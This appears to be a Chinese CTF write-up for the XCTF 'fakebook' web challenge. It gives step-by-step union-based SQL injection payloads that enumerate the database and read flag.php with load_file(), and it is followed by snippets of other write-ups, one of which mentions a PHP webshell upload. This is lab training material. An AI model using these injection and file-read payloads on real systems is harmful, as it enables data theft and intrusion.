攻防世界 Web fakebook

2021-10-09 08:10:05 字數 1206 閱讀 5537

根據提示註冊乙個使用者,blog的位置需要輸入一段**才能通過註冊。註冊成功以後可以檢視使用者資訊。

通過?no=1 and 1=1?no=1 and 1=2可以驗證存在sql注入漏洞,接下來嘗試注入。

使用?no=1 union/**/select 1,2,3,4可以判斷該表中存在4個字段

使用?no=1 and 0 union/**/select 1,2,3,4可以判斷有回顯的字段是第二個

使用?no=1 and 0 union/**/select 1,database(),3,4可以查出當前資料庫是fakebook

使用?no=1 and 0 union/**/select 1,user(),3,4顯示當前使用者是root@localhost

使用?no=1 and 0 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='fakebook'查到當前資料庫中有乙個users表

使用?no=1 and 0 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema='fakebook' and table_name='users'查出users表中有no,username,passwd,data這幾個字段

這道題的flag沒有明說在哪個位置,但是通過掃瞄發現有乙個flag.php的頁面,所以接下來就需要讀取這個頁面的內容。配合剛剛注入時發現的mysql使用者是root,這就可以嘗試使用sql中的load_file()函式來讀取檔案,payload如下:

?no=0 union/**/select 1,load_file("/var/www/html/flag.php"),3,4

在瀏覽器裡可以檢視到flag:

攻防世界mfw 攻防世界 Web mfw

題目資訊 image.png 工具 githack,dirsearch 知識點 git漏洞 審計 開啟題目場景,檢查 發現這樣乙個頁面 image.png 訪問.git目錄,疑似存在git原始碼洩露 image.png 再用dirsearch掃瞄,發現git原始碼洩露 使用 githack獲取原始碼...

攻防世界Web lottery

開心!雖然第一次遇到git原始碼洩露寫了好久,但是寫出來了就很開心 開啟介面我們知道,要拿到flag,就要贏到足夠的錢,其實一開始我以為可以找到乙個地方直接修改餘額什麼的,把網頁源 中的檔案看了幾個都沒發現突破口 然後又沒思路了 嘗試了一下robots.txt,想看看有沒有什麼檔案,然後發現了 瞬間...

攻防世界 xctf Guess writeup

本題的解析官網上有,這裡是乙個自動化的指令碼,完成的是自動上傳乙個ant.jpg的檔案 ant.jpg是乙個ant.zip壓縮包重新命名的檔案,裡面是乙個ant.php的一句話木馬 執行返回的是在web後台這個檔案重新命名後的檔案的url。可通過zip偽協議訪問這個木馬。指令碼如下 import r...